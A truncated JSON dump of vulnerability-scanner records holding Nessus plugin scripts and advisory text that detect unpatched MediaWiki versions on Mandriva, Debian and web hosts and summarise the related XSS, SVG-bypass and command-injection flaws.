"CVE-2013-6451"], "modified": "2014-03-14T00:00:00", "cpe": ["cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:mediawiki-pgsql", "p-cpe:/a:mandriva:linux:mediawiki-mysql", "p-cpe:/a:mandriva:linux:mediawiki-ldapauthentication", "p-cpe:/a:mandriva:linux:mediawiki-sqlite", "p-cpe:/a:mandriva:linux:mediawiki"], "id": "MANDRIVA_MDVSA-2014-057.NASL", "href": "https://www.tenable.com/plugins/nessus/73004", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:057. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73004);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-6451\", \"CVE-2013-6452\", \"CVE-2013-6453\", \"CVE-2013-6472\", \"CVE-2014-1610\", \"CVE-2014-2242\", \"CVE-2014-2243\", \"CVE-2014-2244\");\n script_bugtraq_id(65003, 65223, 65883, 65906, 65910);\n script_xref(name:\"MDVSA\", value:\"2014:057\");\n\n script_name(english:\"Mandriva Linux Security Advisory : mediawiki (MDVSA-2014:057)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated mediawiki packages fix multiple vulnerabilities :\n\nMediaWiki user Michael M reported that the fix for CVE-2013-4568\nallowed insertion of escaped CSS values which could pass the CSS\nvalidation checks, resulting in XSS (CVE-2013-6451).\n\nChris from RationalWiki reported that SVG files could be uploaded that\ninclude external stylesheets, which could lead to XSS when an XSL was\nused to include JavaScript (CVE-2013-6452).\n\nDuring internal review, it was discovered that MediaWiki's SVG\nsanitization could be bypassed when the XML was considered invalid\n(CVE-2013-6453).\n\nDuring internal review, it was discovered that MediaWiki displayed\nsome information about deleted pages in the log API, enhanced\nRecentChanges, and user watchlists (CVE-2013-6472).\n\nNetanel Rubin from Check Point discovered a remote code execution\nvulnerability in MediaWiki's thumbnail generation for DjVu files.\nInternal review also discovered similar logic in the PdfHandler\nextension, which could be exploited in a similar way (CVE-2014-1610).\n\nMediaWiki before 
1.22.3 does not block unsafe namespaces, such as a\nW3C XHTML namespace, in uploaded SVG files. Some client software may\nuse these namespaces in a way that results in XSS. This was fixed by\ndisallowing uploading SVG files using non-whitelisted namespaces\n(CVE-2014-2242).\n\nMediaWiki before 1.22.3 performs token comparison that may be\nvulnerable to timing attacks. This was fixed by making token\ncomparison use constant time (CVE-2014-2243).\n\nMediaWiki before 1.22.3 could allow an attacker to perform XSS\nattacks, due to flaw with link handling in api.php. This was fixed\nsuch that it won't find links in the middle of api.php links\n(CVE-2014-2244).\n\nMediaWiki has been updated to version 1.22.3, which fixes these\nissues, as well as several others.\n\nAlso, the mediawiki-ldapauthentication and mediawiki-math extensions\nhave been updated to newer versions that are compatible with MediaWiki\n1.22.\n\nAdditionally, the mediawiki-graphviz extension has been obsoleted, due\nto the fact that it is unmaintained upstream and is vulnerable to\ncross-site scripting attacks.\n\nNote: if you were using the instances feature in these packages to\nsupport multiple wiki instances, this feature has now been removed.\nYou will need to maintain separate wiki instances manually.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0113.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0124.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n 
script_set_attribute(attribute:\"d2_elliot_name\", value:\"MediaWiki thumb.php page Parameter Remote Shell Command Injection\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MediaWiki Thumb.php Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mediawiki-ldapauthentication\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mediawiki-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mediawiki-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mediawiki-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = 
get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"mediawiki-1.22.3-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"mediawiki-ldapauthentication-2.0f-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"mediawiki-mysql-1.22.3-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"mediawiki-pgsql-1.22.3-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"mediawiki-sqlite-1.22.3-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T12:07:04", "description": "According to its version number, the instance of MediaWiki running on\nthe remote host is affected by the following vulnerabilities :\n\n - Escape sequences are not properly sanitized when passed\n to the 'Sanitizer::checkCss' class, which allows a\n remote attacker to conduct cross-site scripting attacks.\n (CVE-2013-6451)\n\n - An input validation error exists in the\n 'XmlTypeCheck.php' script in uploaded SVG files that\n contain external style sheets, which allows a remote\n attacker to conduct cross-site scripting attacks.\n (CVE-2013-6452)\n\n - Input validation by the checkSvgScriptCallback()\n function is bypassed in the 'UploadBase.php' script\n when an SVG file with invalid XML is uploaded. This\n can result in malicious code execution. (CVE-2013-6453)\n\n - An input validation error exists in the 'Sanitizer.php'\n script when input is submitted to the '-o-link'\n attribute, which allows cross-site scripting attacks in\n Opera 12. 
(CVE-2013-6454)\n\n - An information disclosure vulnerability exists in the\n log API, Enhanced Recent Changes feature, and users'\n watchlists that allows deleted log entries to be viewed.\n (CVE-2013-6472)\n\nAdditionally, the following extensions contain vulnerabilities but\nare not enabled or installed by default (unless otherwise noted) :\n\n - The TimedMediaHandler extension is affected by a\n cross-site scripting vulnerability due to the lack of\n input validation of the 'data-videopayload' attribute\n in the 'mw.PopUpThumbVideo.js' script. (CVE-2013-4574)\n\n - The Scribunto extension is affected by a NULL pointer\n dereference and buffer overflow flaw in the\n implementation of the 'luasandbox' PHP extension that\n can lead to a denial of service or arbitrary code\n execution. (CVE-2013-4570, CVE-2013-4571)\n\n - The CentralAuth extension is affected by an information\n disclosure vulnerability due to the insertion of a\n username into the page's DOM. (CVE-2013-6455)\n\n - The Semantic Forms extension is affected by a cross-site\n request forgery (XSRF) vulnerability due to the lack of\n token validation in the 'Special:CreateCategory' page.\n (CVE-2014-3454)\n\nNote that Nessus has not tested for these issues but has instead\nrelied on the application's self-reported version number.", "edition": 28, "published": "2014-02-06T00:00:00", "title": "MediaWiki < 1.19.10 / 1.21.4 / 1.22.1 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4574", "CVE-2013-4571", "CVE-2013-6455", "CVE-2013-6453", "CVE-2013-6472", "CVE-2014-3454", "CVE-2013-4570", "CVE-2013-6452", "CVE-2013-6454", "CVE-2013-6451"], "modified": "2014-02-06T00:00:00", "cpe": ["cpe:/a:mediawiki:mediawiki"], "id": "MEDIAWIKI_1_19_10.NASL", "href": "https://www.tenable.com/plugins/nessus/72370", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif 
(description)\n{\n script_id(72370);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\n \"CVE-2013-4570\",\n \"CVE-2013-4571\",\n \"CVE-2013-4574\",\n \"CVE-2013-6451\",\n \"CVE-2013-6452\",\n \"CVE-2013-6453\",\n \"CVE-2013-6454\",\n \"CVE-2013-6455\",\n \"CVE-2013-6472\",\n \"CVE-2014-3454\"\n );\n script_bugtraq_id(64966, 65003, 67522);\n\n script_name(english:\"MediaWiki < 1.19.10 / 1.21.4 / 1.22.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of MediaWiki.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains an application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the instance of MediaWiki running on\nthe remote host is affected by the following vulnerabilities :\n\n - Escape sequences are not properly sanitized when passed\n to the 'Sanitizer::checkCss' class, which allows a\n remote attacker to conduct cross-site scripting attacks.\n (CVE-2013-6451)\n\n - An input validation error exists in the\n 'XmlTypeCheck.php' script in uploaded SVG files that\n contain external style sheets, which allows a remote\n attacker to conduct cross-site scripting attacks.\n (CVE-2013-6452)\n\n - Input validation by the checkSvgScriptCallback()\n function is bypassed in the 'UploadBase.php' script\n when an SVG file with invalid XML is uploaded. This\n can result in malicious code execution. (CVE-2013-6453)\n\n - An input validation error exists in the 'Sanitizer.php'\n script when input is submitted to the '-o-link'\n attribute, which allows cross-site scripting attacks in\n Opera 12. 
(CVE-2013-6454)\n\n - An information disclosure vulnerability exists in the\n log API, Enhanced Recent Changes feature, and users'\n watchlists that allows deleted log entries to be viewed.\n (CVE-2013-6472)\n\nAdditionally, the following extensions contain vulnerabilities but\nare not enabled or installed by default (unless otherwise noted) :\n\n - The TimedMediaHandler extension is affected by a\n cross-site scripting vulnerability due to the lack of\n input validation of the 'data-videopayload' attribute\n in the 'mw.PopUpThumbVideo.js' script. (CVE-2013-4574)\n\n - The Scribuntu extension is affected by a NULL pointer\n dereference and buffer overflow flaw in the\n implementation of the 'luasandbox' PHP extension that\n can lead to a denial of service or arbitrary code\n execution. (CVE-2013-4570, CVE-2013-4571)\n\n - The CentralAuth extension is affected by an information\n disclosure vulnerability due to the insertion of a\n username into the page's DOM. (CVE-2013-6455)\n\n - The Semantic Forms extension is affected by a cross-site\n request forgery (XSRF) vulnerability due to the lack of\n token validation in the 'Special:CreateCategory' page.\n (CVE-2014-3454)\n\nNote that Nessus has not tested for these issues but has instead\nrelied on the application's self-reported version number.\");\n # https://lists.wikimedia.org/pipermail/mediawiki-announce/2014-January/000138.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?11acd3f1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.19#MediaWiki_1.19.10\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.20#MediaWiki_1.21.4\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.22#MediaWiki_1.22.1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MediaWiki version 1.19.10 / 1.21.4 / 1.22.1 or 
later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-6453\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/06/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/06\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mediawiki:mediawiki\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"mediawiki_detect.nasl\");\n script_require_keys(\"Settings/ParanoidReport\", \"installed_sw/MediaWiki\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"MediaWiki\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\nversion = install['version'];\ninstall_url = build_url(qs:install['path'], port:port);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nif (\n version =~ \"^1\\.19\\.[0-9]([^0-9]|$)\" ||\n version =~ \"^1\\.21\\.[0-3]([^0-9]|$)\" ||\n version =~ \"^1\\.22\\.[0]([^0-9]|$)\"\n)\n{\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n set_kb_item(name:'www/'+port+'/XSRF', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed versions : 1.19.10 / 1.21.4 / 1.22.1' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T09:48:24", "description": "The remote Debian host is missing a security update. It is, therefore,\naffected by multiple vulnerabilities in MediaWiki :\n\n - A cross-site scripting (XSS) vulnerability exists due to\n a failure to validate input before returning it to the\n user. 
An unauthenticated, remote attacker can exploit\n this, via specially crafted SVG files, to execute\n arbitrary script code in the user's browser session.\n (CVE-2013-2031)\n\n - A flaw exists in the password blocking mechanism due to\n two different tools being used to block password change\n requests, these being Special:PasswordReset and\n Special:ChangePassword, either of which may be bypassed\n by the method the other prevents. A remote attacker can\n exploit this issue to change passwords. (CVE-2013-2032)\n\n - Multiple flaws exist in Sanitizer::checkCss due to the\n improper sanitization of user-supplied input. An\n unauthenticated, remote attacker can exploit these to\n bypass the blacklist. (CVE-2013-4567, CVE-2013-4568)\n\n - A flaw exists due to multiple users being granted the\n same session ID within HTTP headers. A remote attacker\n can exploit this to authenticate as another random\n user. (CVE-2013-4572)\n\n - A cross-site scripting (XSS) vulnerability exists in the\n /includes/libs/XmlTypeCheck.php script due to improper\n validation of user-supplied input. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted XSL file, to execute arbitrary script code in\n the user's browser session. (CVE-2013-6452)\n\n - A flaw exists in the /includes/upload/UploadBase.php\n script due to a failure to apply SVG sanitization when\n XML files are read as invalid. An unauthenticated,\n remote attacker can exploit this to upload non-sanitized\n XML files, resulting in an unspecified impact.\n (CVE-2013-6453)\n\n - A stored cross-site scripting (XSS) vulnerability exists\n in the /includes/Sanitizer.php script due to a failure\n to properly validate the '-o-link' attribute before\n returning it to users. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n request, to execute arbitrary script code in the user's\n browser session. 
(CVE-2013-6454)\n\n - A flaw exists in the log API within the\n /includes/api/ApiQueryLogEvents.php script that allows\n an unauthenticated, remote attacker to disclose\n potentially sensitive information regarding deleted\n pages. (CVE-2013-6472)\n\n - Multiple flaws exist in the PdfHandler_body.php,\n DjVu.php, Bitmap.php, and ImageHandler.php scripts when\n DjVu or PDF file upload support is enabled due to\n improper sanitization of user-supplied input. An\n authenticated, remote attacker can exploit these, via\n the use of shell metacharacters, to execute\n arbitrary shell commands. (CVE-2014-1610)\n\n - A cross-site request forgery (XSRF) vulnerability exists\n in the includes/specials/SpecialChangePassword.php\n script due to a failure to properly handle a correctly\n authenticated but unintended login attempt. An\n unauthenticated, remote attacker, by convincing a user\n to follow a specially crafted link, can exploit this to\n reset the user's password. (CVE-2014-2665)", "edition": 15, "published": "2014-03-31T00:00:00", "title": "Debian DSA-2891-1 : mediawiki, mediawiki-extensions Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4567", "CVE-2013-2031", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-4568", "CVE-2013-6472", "CVE-2013-6452", "CVE-2014-2665", "CVE-2013-6454", "CVE-2013-2032", "CVE-2013-4572"], "modified": "2014-03-31T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:mediawiki-extensions", "cpe:/o:debian:debian_linux:7.0", "p-cpe:/a:debian:debian_linux:mediawiki"], "id": "DEBIAN_DSA-2891.NASL", "href": "https://www.tenable.com/plugins/nessus/73256", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were\n# extracted from Debian Security Advisory DSA-2891\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73256);\n script_version(\"1.16\");\n 
script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\n \"CVE-2013-2031\",\n \"CVE-2013-2032\",\n \"CVE-2013-4567\",\n \"CVE-2013-4568\",\n \"CVE-2013-4572\",\n \"CVE-2013-6452\",\n \"CVE-2013-6453\",\n \"CVE-2013-6454\",\n \"CVE-2013-6472\",\n \"CVE-2014-1610\",\n \"CVE-2014-2665\"\n );\n script_bugtraq_id(\n 59594,\n 59595,\n 63757,\n 63760,\n 63761,\n 65003,\n 65223,\n 66600\n );\n script_xref(name:\"DSA\", value:\"2891\");\n\n script_name(english:\"Debian DSA-2891-1 : mediawiki, mediawiki-extensions Multiple Vulnerabilities\");\n script_summary(english:\"Checks the dpkg output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Debian host is missing a security update. It is, therefore,\naffected by multiple vulnerabilities in MediaWiki :\n\n - A cross-site scripting (XSS) vulnerability exists due to\n a failure to validate input before returning it to the\n user. An unauthenticated, remote attacker can exploit\n this, via specially crafted SVG files, to execute\n arbitrary script code in the user's browser session.\n (CVE-2013-2031)\n\n - A flaw exists in the password blocking mechanism due to\n two different tools being used to block password change\n requests, these being Special:PasswordReset and\n Special:ChangePassword, either of which may be bypassed\n by the method the other prevents. A remote attacker can\n exploit this issue to change passwords. (CVE-2013-2032)\n\n - Multiple flaws exist in Sanitizer::checkCss due to the\n improper sanitization of user-supplied input. An\n unauthenticated, remote attacker can exploit these to\n bypass the blacklist. (CVE-2013-4567, CVE-2013-4568)\n\n - A flaw exists due to multiple users being granted the\n same session ID within HTTP headers. 
A remote attacker\n can exploit this to authenticate as another random\n user. (CVE-2013-4572)\n\n - A cross-site scripting (XSS) vulnerability exists in the\n /includes/libs/XmlTypeCheck.php script due to improper\n validation of user-supplied input. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted XSL file, to execute arbitrary script code in\n the user's browser session. (CVE-2013-6452)\n\n - A flaw exists in the /includes/upload/UploadBase.php\n script due to a failure to apply SVG sanitization when\n XML files are read as invalid. An unauthenticated,\n remote attacker can exploit this to upload non-sanitized\n XML files, resulting in an unspecified impact.\n (CVE-2013-6453)\n\n - A stored cross-site (XSS) scripting vulnerability exists\n in the /includes/Sanitizer.php script due to a failure\n to properly validate the '-o-link' attribute before\n returning it to users. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n request, to execute arbitrary script code in the user's\n browser session. (CVE-2013-6454)\n\n - A flaw exists in the log API within the\n /includes/api/ApiQueryLogEvents.php script that allows\n an unauthenticated, remote attacker to disclose\n potentially sensitive information regarding deleted\n pages. (CVE-2013-6472)\n\n - Multiple flaws exist in the PdfHandler_body.php,\n DjVu.php, Bitmap.php, and ImageHandler.php scripts when\n DjVu or PDF file upload support is enabled due to\n improper sanitization of user-supplied input. An\n authenticated, remote attacker can exploit these, via\n the use of shell metacharacters, to execute execute\n arbitrary shell commands. (CVE-2014-1610)\n\n - A cross-site request forgery (XSRF) vulnerability exists\n in the includes/specials/SpecialChangePassword.php\n script due to a failure to properly handle a correctly\n authenticated but unintended login attempt. 
An\n unauthenticated, remote attacker, by convincing a user\n to follow a specially crafted link, can exploit this to\n reset the user's password. (CVE-2014-2665)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=729629\");\n script_set_attribute(attribute:\"see_also\", value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=706601\");\n script_set_attribute(attribute:\"see_also\", value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=742857\");\n script_set_attribute(attribute:\"see_also\", value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=742857\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-2031\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-2032\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-4567\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-4568\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-4572\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-6452\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-6453\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-6454\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-6472\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2014-1610\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2014-2665\");\n script_set_attribute(attribute:\"see_also\", 
value:\"https://packages.debian.org/source/wheezy/mediawiki\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/wheezy/mediawiki-extensions\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.debian.org/security/2014/dsa-2891\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the mediawiki packages. For the stable distribution (wheezy),\nthese issues have been fixed in version 1:1.19.14+dfsg-0+deb7u1 of the\nmediawiki package and version 3.5~deb7u1 of the mediawiki-extensions\npackage.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"MediaWiki thumb.php page Parameter Remote Shell Command Injection\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MediaWiki Thumb.php Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mediawiki-extensions\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\ninclude(\"misc_func.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\noslevel = get_kb_item(\"Host/Debian/release\"); \nif (empty_or_null(oslevel)) audit(AUDIT_OS_NOT, \"Debian\");\nif (oslevel !~ \"^7\\.\") audit(AUDIT_OS_NOT, \"Debian 7\", \"Debian \" + oslevel);\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki\", reference:\"1:1.19.14+dfsg-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki-extensions\", reference:\"3.5~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki-extensions-base\", reference:\"3.5~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki-extensions-collection\", reference:\"3.5~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki-extensions-geshi\", reference:\"3.5~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki-extensions-graphviz\", reference:\"3.5~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki-extensions-ldapauth\", reference:\"3.5~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki-extensions-openid\", reference:\"3.5~deb7u1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n xss : TRUE,\n xsrf : TRUE,\n extra : deb_report_get()\n );\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T11:04:25", "description": "The 
remote host is affected by the vulnerability described in GLSA-201502-04\n(MediaWiki: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in MediaWiki. Please\n review the CVE identifiers and MediaWiki announcement referenced below\n for details.\n \nImpact :\n\n A remote attacker may be able to execute arbitrary code with the\n privileges of the process, create a Denial of Service condition, obtain\n sensitive information, bypass security restrictions, and inject arbitrary\n web script or HTML.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 27, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-02-09T00:00:00", "title": "GLSA-201502-04 : MediaWiki: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9476", "CVE-2014-9479", "CVE-2014-2244", "CVE-2014-9477", "CVE-2014-5243", "CVE-2014-5241", "CVE-2014-2242", "CVE-2014-9487", "CVE-2014-5242", "CVE-2014-7199", "CVE-2014-1610", "CVE-2013-6453", "CVE-2014-9277", "CVE-2013-6472", 